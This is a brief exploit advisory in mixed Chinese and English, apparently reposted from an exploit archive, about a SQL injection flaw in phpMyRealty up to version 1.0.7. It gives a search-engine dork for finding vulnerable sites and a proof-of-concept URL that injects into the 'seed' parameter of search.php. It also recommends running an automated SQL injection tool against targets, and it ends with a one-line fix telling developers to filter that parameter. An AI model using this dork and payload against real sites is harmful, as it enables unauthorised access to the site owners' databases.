标题: [phpMyRealty <= v. 1.0.7 SQL Injection Vulnerability] 关键词: [intext:Sort By: Submission Date | Bedrooms | Bathrooms | Price (ASC) | Price (DESC)] 作者: [H4T$A] 下载: [http://www.phpmyrealty.com/] 版本: [v. 1.0.7] # |Contact:newboy62@live.com #Gr33tz f0r th3 >> best egyption hacker >>> H4T$A
||=========================================================================================
本问题影响该程序所有版本

Exploit :
https://www.webshell.cc/search.php?seed=640'

用 Haivj等SQL注射工具就简单了

remember you will change the link to >> ||search.php?seed=-640||before
start using Haivj 🙂

修复：过滤 search.php页面 seed参数输入